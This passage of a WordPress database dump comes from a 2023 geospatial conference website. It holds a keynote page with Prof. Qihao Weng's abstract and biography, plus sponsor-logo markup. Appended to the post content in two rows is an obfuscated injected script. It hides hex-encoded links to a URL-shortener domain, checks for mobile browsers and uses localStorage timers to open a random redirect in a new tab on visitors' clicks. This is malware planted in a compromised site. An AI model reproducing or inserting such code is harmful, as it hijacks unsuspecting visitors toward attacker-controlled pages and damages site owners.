function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-30 12:45:33','2023-06-30 12:45:33','',4849,'https://gsw2023.com/?p=4969',0,'revision','',0),
(4971,1,'2023-07-10 00:04:42','2023-07-10 00:04:42','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Prof. Qihao Weng</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Abstract</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Driven by improvements in satellite sensor technology and image/data processing techniques, especially due to recent development in Geospatial Artificial Intelligence (GeoAI), Earth Observation (EO) has become an essential tool for understanding the Earth surface processes and managing human-environment interactions. Urbanization studies are vital in improving the understanding of the relationship between urban growth, global change, and human well-being. Such studies are crucial for the mitigation of adverse effects of urban warming and the examination of heat hazards and related health issues. Three key science questions arise, including: (1) How can EO and GeoAI be combined to better characterize urbanization processes at the local, regional, and global scale? (2) How can quality EO data be generated and used to characterize and quantify the changes in land cover and land use from urbanization that affect the sustainability of natural and human ecosystems? And (3) how can we characterize the urbanization effect to help mitigate its impacts on human health concerns and well-being? This lecture examines the state-of-the-art methodologies in EO and GeoAI for generating quality EO data and using them to analyze heat risks in the North America and Asia for the present and future times and to examine the dynamics of urban risks under different population growth and climate change scenarios for various vulnerability groups of people. The lecture is followed by discussion on future opportunities in international collaboration and cooperation to advance use of open Earth observations to support urban resilience and sustainable urban development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Biography</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Qihao Weng has been a Chair Professor of Geomatics and Artificial Intelligence and Global STEM Scholar at the Hong Kong Polytechnic University since July 2021, where he also directs Jockey Club STEM Lab of Earth Observations and Research Centre for Artificial Intelligence in Geomatics. Before that, he worked as the Director of the Center for Urban and Environmental Change and a Professor of Geography at Indiana State University, USA, for 20 years, and visited the NASA Marshall Space Flight Center from Dec. 2008 to Dec. 2009 as a Senior Fellow. Prof. Weng also serves as an Editor-in-Chief of ISPRS Journal of Photogrammetry and Remote Sensing, and the Lead of GEO’s Global Urban Observation and Information Initiative since 2012. Dr. Weng is a Foreign Member of Academia Europaea and an elected Fellow of the Institute of Electrical and Electronics Engineers (IEEE), American Association for the Advancement of Science (AAAS), American Association of Geographers (AAG), American Society for Photogrammetry and Remote Sensing (ASPRS), and Asia-Pacific Artificial Intelligence Association (AAIA). He has been honored with distinguished career awards that include NASA senior fellowship, AAG Distinguished Scholarship Honors Award, Taylor &amp; Francis Lifetime Achievements Award, and a fellowship from Japan Society for the Promotion of Science (Short-term S[E], formerly known as “JSPS Award for Eminent Scientists”). He is the author of 277 articles, 14 books, and 5 conference proceedings, with over 30,000 citations and H-index of 77.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Contact Information</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Qihao Weng, Ph.D., MAE, AAAS/IEEE/AAG/ASPRS/AAIA Fellow<br>Editor-in-Chief, ISPRS Journal of Photogrammetry &amp; Remote Sensing<br>Chair Professor of Geomatics and Artificial Intelligence &amp; Global STEM Scholar<br>Director, JC STEM Lab of Earth Observations<br>Director, Research Centre for Artificial Intelligence in Geomatics<br>Department of Land Surveying and Geo-Informatics<br>The Hong Kong Polytechnic University<br>Phone +852-2766-5959<br>https://qihaoweng.net<br>https://weng-poleis.com/</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Qihao Weng,  Earth Observations and Geospatial AI for Sustainable Urban Development','','publish','closed','closed','','earth-observations-and-geospatial-ai-for-sustainable-urban-development','','','2023-07-10 00:44:12','2023-07-10 00:44:12','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4971',0,'dt_team','',0),
(4972,1,'2023-07-10 00:01:51','2023-07-10 00:01:51','','phd qihao','','inherit','open','closed','','phd-qihao','','','2023-07-10 00:01:51','2023-07-10 00:01:51','',4971,'https://gsw2023.com/wp-content/uploads/2023/07/phd-qihao.png',0,'attachment','image/png',0),
(4973,1,'2023-07-10 00:08:53','2023-07-10 00:08:53','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" 